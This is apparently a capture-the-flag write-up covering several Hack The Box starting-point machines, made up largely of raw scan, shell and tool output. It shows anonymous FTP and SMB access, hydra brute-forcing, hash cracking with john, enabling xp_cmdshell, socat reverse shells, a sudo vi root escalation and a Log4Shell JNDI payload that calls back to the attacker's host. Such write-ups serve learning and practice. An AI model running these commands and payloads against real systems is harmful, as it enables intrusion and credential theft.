# Nmap 7.92 scan initiated Sun Apr 17 18:38:58 2022 as: nmap -sSVC -p- -T4 -v -oA nmap_full 10.129.157.43 Nmap scan report for 10.129.157.43 Host is up (0.023s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 23/tcp open telnet Linux telnetd Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Apr 17 18:39:29 2022 -- 1 IP address (1 host up) scanned in 31.56 seconds
75 updates can be applied immediately. 31 of these updates are standard security updates. To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old. To check for new updates run: sudo apt update
Last login: Mon Sep 6 15:15:23 UTC 2021 from 10.10.14.18 on pts/0 root@Meow:~# id uid=0(root) gid=0(root) groups=0(root) root@Meow:~# cat flag.txt edited
# Nmap 7.92 scan initiated Sun Apr 17 18:51:32 2022 as: nmap -sSVC -p- -T4 -v -oA fawn 10.129.6.54 Nmap scan report for 10.129.6.54 Host is up (0.018s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.10.14.190 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status Service Info: OS: Unix
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Apr 17 18:51:45 2022 -- 1 IP address (1 host up) scanned in 13.15 seconds
There is only a FTP server allowing anonymous connections.
$ ftp 10.129.6.54 Connected to 10.129.6.54. 220 (vsFTPd 3.0.3) Name (10.129.6.54:noraj): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 0 0 32 Jun 04 2021 flag.txt 226 Directory send OK. ftp> get flag.txt 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for flag.txt (32 bytes). 226 Transfer complete. 32 bytes received in 0.00133 seconds (23.6 kbytes/s) ftp> quit 221 Goodbye.
# Nmap 7.92 scan initiated Sun Apr 17 19:08:43 2022 as: nmap -sSVC -p- -T4 -v -oA dancing 10.129.176.22 Nmap scan report for 10.129.176.22 Host is up (0.018s latency). Not shown: 65524 closed tcp ports (reset) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Apr 17 19:10:09 2022 -- 1 IP address (1 host up) scanned in 85.24 seconds
===================================== | Service Scan on 10.129.176.22 | ===================================== [*] Checking SMB [+] SMB is accessible on 445/tcp [*] Checking SMB over NetBIOS [+] SMB over NetBIOS is accessible on 139/tcp
========================================== | RPC Session Check on 10.129.176.22 | ========================================== [*] Check for null session [+] Server allows session using username '', password '' [*] Check for random user session [-] Could not establish random user session: STATUS_INVALID_PARAMETER
==================================================== | Domain Information via RPC for 10.129.176.22 | ==================================================== [-] Could not get domain information via 'lsaquery': STATUS_ACCESS_DENIED
============================================================ | Domain Information via SMB session for 10.129.176.22 | ============================================================ [*] Enumerating via unauthenticated SMB session on 445/tcp [+] Found domain information via SMB NetBIOS computer name: DANCING NetBIOS domain name: '' DNS domain: Dancing FQDN: Dancing
======================================= | Shares via RPC on 10.129.176.22 | ======================================= [*] Enumerating shares [+] Found 0 share(s) for user '' with password '', try a different user
Completed after 3.15 seconds
$ smbmap -H 10.129.176.22 --no-banner
[+] IP: 10.129.176.22:445 Name: 10.129.176.22 Status: Authenticated [!] Something weird happened: SMB SessionError: STATUS_ACCESS_DENIED({Access Denied} A process has requested access to an object but has not been granted those access rights.) on line 967
In fact it's just refusing connection from a null user, so we can put anything
else as username and we can list a few shares:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19
$ smbclient -L 10.129.176.22 -U 'noraj' -N
Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC WorkShares Disk SMB1 disabled -- no workgroup available
# Nmap 7.92 scan initiated Sun Apr 17 19:48:49 2022 as: nmap -sSVC -p- -T4 -v -oA appointment 10.129.92.59 Nmap scan report for 10.129.92.59 Host is up (0.017s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.38 ((Debian)) |_http-title: Login |_http-favicon: Unknown favicon MD5: 7D4140C76BF7648531683BFA4F7F8C22 | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.38 (Debian)
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Apr 17 19:49:07 2022 -- 1 IP address (1 host up) scanned in 18.30 seconds
# Nmap 7.92 scan initiated Sun Apr 17 20:26:01 2022 as: nmap -sSVC -p- -T4 -v -oA sequel 10.129.94.61 Nmap scan report for 10.129.94.61 Host is up (0.021s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 3306/tcp open mysql? |_sslv2: ERROR: Script execution failed (use -d to debug) | mysql-info: | Protocol: 10 | Version: 5.5.5-10.3.27-MariaDB-0+deb10u1 | Thread ID: 66 | Capabilities flags: 63486 | Some Capabilities: Support41Auth, SupportsTransactions, SupportsLoadDataLocal, Speaks41ProtocolOld, InteractiveClient, DontAllowDatabaseTableColumn, LongColumnFlag, IgnoreSigpipes, Speaks41ProtocolNew, FoundRows, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, ODBCClient, SupportsCompression, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins | Status: Autocommit | Salt: v`]3#Ubp*|Vy~/jLy@p5 |_ Auth Plugin Name: mysql_native_password |_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug) |_ssl-cert: ERROR: Script execution failed (use -d to debug) |_tls-alpn: ERROR: Script execution failed (use -d to debug) |_ssl-date: ERROR: Script execution failed (use -d to debug)
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Apr 17 20:29:33 2022 -- 1 IP address (1 host up) scanned in 212.46 seconds
$ mysql -h 10.129.94.61 -u root ... MariaDB [(none)]> SHOW DATABASES; +--------------------+ | Database | +--------------------+ | htb | | information_schema | | mysql | | performance_schema | +--------------------+ 4 rows in set (0.019 sec)
MariaDB [(none)]> USE htb; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A
Database changed MariaDB [htb]> SHOW TABLES; +---------------+ | Tables_in_htb | +---------------+ | config | | users | +---------------+ 2 rows in set (0.017 sec)
# Nmap 7.92 scan initiated Sun Apr 17 21:18:17 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/crocodile 10.129.10.200 Nmap scan report for 10.129.10.200 Host is up (0.016s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-anon: Anonymous FTP login allowed (FTP code 230) | -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist |_-rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:10.10.14.190 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-favicon: Unknown favicon MD5: 1248E68909EAE600881B8DB1AD07F356 |_http-title: Smash - Bootstrap Business Template |_http-server-header: Apache/2.4.41 (Ubuntu) Service Info: OS: Unix
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sun Apr 17 21:18:36 2022 -- 1 IP address (1 host up) scanned in 19.01 seconds
$ ftp 10.129.85.38 Connected to 10.129.85.38. 220 (vsFTPd 3.0.3) Name (10.129.85.38:noraj): anonymous 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 33 Jun 08 2021 allowed.userlist -rw-r--r-- 1 ftp ftp 62 Apr 20 2021 allowed.userlist.passwd 226 Directory send OK. ftp> get allowed.userlist 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for allowed.userlist (33 bytes). 226 Transfer complete. 33 bytes received in 7.6e-05 seconds (424 kbytes/s) ftp> get allowed.userlist.passwd 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for allowed.userlist.passwd (62 bytes). 226 Transfer complete. 62 bytes received in 0.00109 seconds (55.3 kbytes/s) ftp> quit 221 Goodbye.
Those are a list of users and a list of passwords:
So let's use the two list to bruteforce our way in.
1 2 3 4 5 6 7 8 9
$ hydra -L allowed.userlist -P allowed.userlist.passwd 10.129.85.38 http-post-form "/login.php:Username=^USER^&Password=^PASS^&Submit=Login:Warning\!" Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-04-18 14:22:53 [DATA] max 16 tasks per 1 server, overall 16 tasks, 16 login tries (l:4/p:4), ~1 try per task [DATA] attacking http-post-form://10.129.85.38:80/login.php:Username=^USER^&Password=^PASS^&Submit=Login:Warning! [80][http-post-form] host: 10.129.85.38 login: admin password: rKXM59ESxesUFHAd 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-04-18 14:22:55
# Nmap 7.92 scan initiated Mon Apr 18 14:37:29 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/responder 10.129.79.102 Nmap scan report for 10.129.79.102 Host is up (0.020s latency). Not shown: 65532 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1) |_http-title: Site doesn't have a title (text/html; charset=UTF-8). | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/8.1.1 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 7680/tcp open pando-pub? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Apr 18 14:40:05 2022 -- 1 IP address (1 host up) scanned in 156.59 seconds
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=netntlmv2 Using default input encoding: UTF-8 Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status badminton (Administrator) 1g 0:00:00:00 DONE (2022-04-18 15:57) 1.063g/s 4357p/s 4357c/s 4357C/s slimshady..oooooo Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably Session completed
# Nmap 7.92 scan initiated Mon Apr 18 16:39:49 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/archetype 10.129.239.121 Nmap scan report for 10.129.239.121 Host is up (0.019s latency). Not shown: 65523 closed tcp ports (reset) PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds 1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM | ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback | Issuer: commonName=SSL_Self_Signed_Fallback | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2022-04-18T14:11:03 | Not valid after: 2052-04-18T14:11:03 | MD5: 9fd9 4a91 0d78 15c9 22aa 2e19 1b1a aec2 |_SHA-1: e937 370f 6283 2e8c da73 cdc2 43a5 cebe daf5 b993 |_ssl-date: 2022-04-18T14:41:17+00:00; 0s from scanner time. | ms-sql-ntlm-info: | Target_Name: ARCHETYPE | NetBIOS_Domain_Name: ARCHETYPE | NetBIOS_Computer_Name: ARCHETYPE | DNS_Domain_Name: Archetype | DNS_Computer_Name: Archetype |_ Product_Version: 10.0.17763 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results: |_clock-skew: mean: 1h24m00s, deviation: 3h07m51s, median: 0s | smb2-time: | date: 2022-04-18T14:41:08 |_ start_date: N/A | ms-sql-info: | 10.129.239.121:1433: | Version: | name: Microsoft SQL Server 2017 RTM | number: 14.00.1000.00 | Product: Microsoft SQL Server 2017 | Service pack level: RTM | Post-SP patches applied: false |_ TCP port: 1433 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3) | Computer name: Archetype | NetBIOS computer name: ARCHETYPE\x00 | Workgroup: WORKGROUP\x00 |_ System time: 2022-04-18T07:41:11-07:00 | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Apr 18 16:41:17 2022 -- 1 IP address (1 host up) scanned in 87.78 seconds
Password: [*] Encryption required, switching to TLS [*] ENVCHANGE(DATABASE): Old Value: master, New Value: master [*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english [*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192 [*] INFO(ARCHETYPE): Line 1: Changed database context to 'master'. [*] INFO(ARCHETYPE): Line 1: Changed language setting to us_english. [*] ACK: Result: 1 - Microsoft SQL Server (140 3232) [!] Press help for extra shell commands SQL>
SQL> SELECT @@version Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64) Aug 22 2017 17:04:49 Copyright (C) 2017 Microsoft Corporation Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
SQL> SELECT HOST_NAME() VzIpejXi
Listing tables it doesn't seem we'll find interesting secrets but enumerating
our permissions it seems we have full admin access.
1 2 3 4 5 6 7 8 9 10 11
SQL> SELECT DB_NAME() master
SQL> SELECT is_srvrolemember('sysadmin'); 1
SQL> SELECT is_srvrolemember('serveradmin'); 1
SQL> SELECT is_srvrolemember('securityadmin'); 1
This will allow us to execute commands with xp_cmdshell.
lcd {path} - changes the current local directory to {path} exit - terminates the server process (and this session) enable_xp_cmdshell - you know what it means disable_xp_cmdshell - you know what it means xp_cmdshell {cmd} - executes cmd using xp_cmdshell sp_start_job {cmd} - executes cmd using the sql server agent (blind) ! {cmd} - executes a local shell cmd
SQL> xp_cmdshell whoami [-] ERROR(ARCHETYPE): Line 1: SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
SQL> enable_xp_cmdshell [*] INFO(ARCHETYPE): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install. [*] INFO(ARCHETYPE): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
$ ftp 10.129.109.17 Connected to 10.129.109.17. 220 (vsFTPd 3.0.3) Name (10.129.109.17:noraj): anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 200 PORT command successful. Consider using PASV. 150 Here comes the directory listing. -rwxr-xr-x 1 0 0 2533 Apr 13 2021 backup.zip 226 Directory send OK. ftp> get backup.zip 200 PORT command successful. Consider using PASV. 150 Opening BINARY mode data connection for backup.zip (2533 bytes). 226 Transfer complete. 2533 bytes received in 0.00196 seconds (1.23 Mbytes/s) ftp> quit 221 Goodbye.
$ zip2john backup.zip > hash.txt $ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=pkzip Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status 741852963 (backup.zip) 1g 0:00:00:01 DONE (2022-04-20 20:43) 0.9803g/s 8031p/s 8031c/s 8031C/s 123456..total90 Use the "--show" option to display all of the cracked passwords reliably Session completed
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5 Using default input encoding: UTF-8 Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3]) Warning: no OpenMP support for this hash type, consider --fork=4 Press 'q' or Ctrl-C to abort, almost any other key for status qwerty789 (?) 1g 0:00:00:01 DONE (2022-04-20 20:57) 0.8547g/s 85661p/s 85661c/s 85661C/s roses12..poepje Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably Session completed
$ socat -d -d TCP-LISTEN:9999 STDOUT 2022/04/20 21:21:27 socat[10413] N listening on AF=2 0.0.0.0:9999 2022/04/20 21:25:29 socat[10413] N accepting connection from AF=2 10.129.109.17:35402 on AF=2 10.10.15.186:9999 2022/04/20 21:25:29 socat[10413] N using stdout for reading and writing 2022/04/20 21:25:29 socat[10413] N starting data transfer loop with FDs [6,6] and [1,1] postgres@vaccine:/var/lib/postgresql/11/main$ id uid=111(postgres) gid=117(postgres) groups=117(postgres),116(ssl-cert) postgres@vaccine:/var/lib/postgresql$ cat user.txt edited
There are the the DB credentials, let's hope the same password is used for PAM,
it is generally the case for DB system accounts.
Let's connect from SSH for a more stable connection.
1
$ ssh postgres@10.129.109.17
We can execute vi as root.
1 2 3 4 5 6
postgres@vaccine:~$ sudo -l Matching Defaults entries for postgres on vaccine: env_keep+="LANG LANGUAGE LINGUAS LC_* _XKB_CHARSET", env_keep+="XAPPLRESDIR XFILESEARCHPATH XUSERFILESEARCHPATH", secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, mail_badpass
User postgres may run the following commands on vaccine: (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
We can use -c option here but ff course we can just launch vi
and then use :!/bin/bash.
1 2 3 4 5 6
$ gtfoblookup gtfobins search -c sudo vi vi:
sudo:
Code: sudo vi -c ':!/bin/sh' /dev/null
1 2 3 4
root@vaccine:/var/lib/postgresql# id uid=0(root) gid=0(root) groups=0(root) root@vaccine:/var/lib/postgresql# cat /root/root.txt edited
# Nmap 7.92 scan initiated Sat Apr 23 16:21:10 2022 as: nmap -sSVC -p- -T4 -v -oA scans/nmap/unified 10.129.38.1 Nmap scan report for 10.129.38.1 Host is up (0.027s latency). Not shown: 65529 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA) | 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA) |_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519) 6789/tcp open ibm-db2-admin? 8080/tcp open http-proxy | fingerprint-strings: | FourOhFourRequest: ... | GetRequest, HTTPOptions: | HTTP/1.1 302 | Location: http://localhost:8080/manage | Content-Length: 0 | Date: Sat, 23 Apr 2022 14:21:34 GMT | Connection: close | RTSPRequest, Socks5: ... | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-open-proxy: Proxy might be redirecting requests |_http-title: Did not follow redirect to https://10.129.38.1:8443/manage 8443/tcp open ssl/nagios-nsca Nagios NSCA | http-title: UniFi Network |_Requested resource was /manage/account/login?redirect=%2Fmanage | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS | ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US | Subject Alternative Name: DNS:UniFi | Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-12-30T21:37:24 | Not valid after: 2024-04-03T21:37:24 | MD5: e6be 8c03 5e12 6827 d1fe 612d dc76 a919 |_SHA-1: 111b aa11 9cca 4401 7cec 6e03 dc45 5cfe 65f6 d829 8843/tcp open ssl/unknown | fingerprint-strings: | GetRequest, HTTPOptions, RTSPRequest: ... | ssl-cert: Subject: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US | Subject Alternative Name: DNS:UniFi | Issuer: commonName=UniFi/organizationName=Ubiquiti Inc./stateOrProvinceName=New York/countryName=US | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha256WithRSAEncryption | Not valid before: 2021-12-30T21:37:24 | Not valid after: 2024-04-03T21:37:24 | MD5: e6be 8c03 5e12 6827 d1fe 612d dc76 a919 |_SHA-1: 111b aa11 9cca 4401 7cec 6e03 dc45 5cfe 65f6 d829 8880/tcp open cddbp-alt? | fingerprint-strings: | FourOhFourRequest: ... | GetRequest: ... | HTTPOptions: ...
Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Sat Apr 23 16:24:21 2022 -- 1 IP address (1 host up) scanned in 191.08 seconds
The morphisec post doesn't go to much in details and is quoting the
sprocketsecurity anyway so let's see the original article.
In this article, we are going to exploit Log4j vulnerabilities in Unifi software, get a reverse shell, and leverage our access to add our own administrative user to the Unifi MongoDB instance.
To automate this process we have released a GitHub repository to exploit the vulnerability: https://github.com/puzzlepeaches/Log4jUnifi
$ curl -i -s -k -X POST --data-binary $'{\"username\":\"a\",\"password\":\"a\",\"remember\":\"${jndi:ldap://10.10.15.146:1389/o=tomcat}\",\"strict\":true}' https://10.129.38.1:8443/api/login
We just receive the connection:
1 2 3 4 5 6 7
$ socat -d -d TCP-LISTEN:9999 STDOUT 2022/04/23 19:28:20 socat[19669] N listening on AF=2 0.0.0.0:9999 2022/04/23 19:35:56 socat[19669] N accepting connection from AF=2 10.129.38.1:48890 on AF=2 10.10.15.146:9999 2022/04/23 19:35:56 socat[19669] N using stdout for reading and writing 2022/04/23 19:35:56 socat[19669] N starting data transfer loop with FDs [6,6] and [1,1] id uid=999(unifi) gid=999(unifi) groups=999(unifi)
Let's upgrade the shell:
1 2 3
script /dev/null -c bash Script started, file is /dev/null unifi@unified:/usr/lib/unifi$
# list all sites $ mongo --port 27117 ace --eval "db.site.find().forEach(printjson);"
# add privileges for the super site to the user mongo --port 27117 ace --eval 'db.privilege.insert({ "admin_id" : "62645da6b823b963d1c94d62", "permissions" : [ ], "role" : "admin", "site_id" : "61ce269d46e0fb0012d47ec4" });'
Now we can connect to the Unify interface with either administrator / noraj
or noraj / noraj which are both administrator.
SSH credentials can the be stolen from the settings page: root / NotACrackablePassword4U2022.
Alternatively we could have added a SSH key.
Then we just have to connect over SSH.
1 2 3 4 5 6
$ ssh root@10.129.96.149
root@unified:~# id uid=0(root) gid=0(root) groups=0(root) root@unified:~# cat root.txt edited